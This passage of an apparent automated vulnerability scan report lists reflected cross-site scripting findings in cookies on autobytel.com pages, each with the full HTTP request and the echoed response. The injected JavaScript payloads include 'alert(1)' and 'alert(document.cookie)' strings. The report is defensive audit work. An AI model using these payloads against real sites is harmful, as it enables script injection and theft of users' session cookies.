HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:39 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
"";
           //s.prop7 = "buy|";

           //s.prop9 = "buy|Search Engine Optimization Project|13148";
           s.prop10 = "buy|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "acb53";alert(1)//e8c2790b457||";

           s.prop14 = "buy|warranties : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "buy||||sky|ban|Search Engi
...[SNIP]...

4.2030. http://www.autobytel.com/content/buy/warranty/index.cfm [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/warranty/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload ea2f7<img%20src%3da%20onerror%3dalert(1)>0d22b5eeda3 was submitted in the PV_CT cookie. This input was echoed as ea2f7<img src=a onerror=alert(1)>0d22b5eeda3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2ea2f7<img%20src%3da%20onerror%3dalert(1)>0d22b5eeda3; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 47229
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:29:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:29:25 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:29:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:29:25 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2ea2f7<img src=a onerror=alert(1)>0d22b5eeda3 cannot be converted to a number.
</h1>
...[SNIP]...

4.2031. http://www.autobytel.com/content/home/help/index.cfm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d595"%3balert(1)//ef6e8a896d9 was submitted in the BDATALIST cookie. This input was echoed as 5d595";alert(1)//ef6e8a896d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c45d595"%3balert(1)//ef6e8a896d9; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45267

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c45d595";alert(1)//ef6e8a896d9";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47EFC719-04BB-A618-562C235A
...[SNIP]...

4.2032. http://www.autobytel.com/content/home/help/index.cfm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4235c"%3balert(1)//1b57b2c436c was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 4235c";alert(1)//1b57b2c436c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=4235c"%3balert(1)//1b57b2c436c; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45267

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";

           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "4235c";alert(1)//1b57b2c436c||";

           s.prop14 = "home|help : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search Engine O
...[SNIP]...

4.2033. http://www.autobytel.com/content/home/help/index.cfm [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 1daef<img%20src%3da%20onerror%3dalert(1)>3c8b2be1541 was submitted in the PV_CT cookie. This input was echoed as 1daef<img src=a onerror=alert(1)>3c8b2be1541 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=21daef<img%20src%3da%20onerror%3dalert(1)>3c8b2be1541; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 52986
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:39:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:39:34 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:39:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:39:34 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 21daef<img src=a onerror=alert(1)>3c8b2be1541 cannot be converted to a number.
</h1>
...[SNIP]...

4.2034. http://www.autobytel.com/content/home/help/index.cfm/action/about [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/about

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b56f"%3balert(1)//eaebc7de927 was submitted in the BDATALIST cookie. This input was echoed as 2b56f";alert(1)//eaebc7de927 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c42b56f"%3balert(1)//eaebc7de927; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:52 GMT
Content-Length: 32349
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:52 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c42b56f";alert(1)//eaebc7de927";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47E640E9-97ED-9F00-75F4064F
...[SNIP]...

4.2035. http://www.autobytel.com/content/home/help/index.cfm/action/about [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/about

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf1d7"%3balert(1)//20912d36e15 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as bf1d7";alert(1)//20912d36e15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=bf1d7"%3balert(1)//20912d36e15; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:41:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:53 GMT
Content-Length: 32349
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:41:52 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";

           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "bf1d7";alert(1)//20912d36e15||";

           s.prop14 = "home|help|about : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search En
...[SNIP]...

4.2036. http://www.autobytel.com/content/home/help/index.cfm/action/about [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/about

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 8a98a<img%20src%3da%20onerror%3dalert(1)>bc5962624b5 was submitted in the PV_CT cookie. This input was echoed as 8a98a<img src=a onerror=alert(1)>bc5962624b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=28a98a<img%20src%3da%20onerror%3dalert(1)>bc5962624b5; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 40069
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:38:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:29 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:28 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 28a98a<img src=a onerror=alert(1)>bc5962624b5 cannot be converted to a number.
</h1>
...[SNIP]...

4.2037. http://www.autobytel.com/content/home/help/index.cfm/action/contact [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/contact

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e558"%3balert(1)//8c064b049ab was submitted in the BDATALIST cookie. This input was echoed as 7e558";alert(1)//8c064b049ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c47e558"%3balert(1)//8c064b049ab; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:46 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36634

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c47e558";alert(1)//8c064b049ab";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47AE7DAC-DDB9-8AA1-FC92B024
...[SNIP]...

4.2038. http://www.autobytel.com/content/home/help/index.cfm/action/contact [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/contact

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 475cb"%3balert(1)//29f7f8885d8 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 475cb";alert(1)//29f7f8885d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=475cb"%3balert(1)//29f7f8885d8; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 36634
Expires: Mon, 24 Jan 2011 23:35:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:49 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:49 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";

           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "475cb";alert(1)//29f7f8885d8||";

           s.prop14 = "home|help|contact : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search
...[SNIP]...

4.2039. http://www.autobytel.com/content/home/help/index.cfm/action/contact [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/contact

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 7f46e<img%20src%3da%20onerror%3dalert(1)>c81dcfa2ffc was submitted in the PV_CT cookie. This input was echoed as 7f46e<img src=a onerror=alert(1)>c81dcfa2ffc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

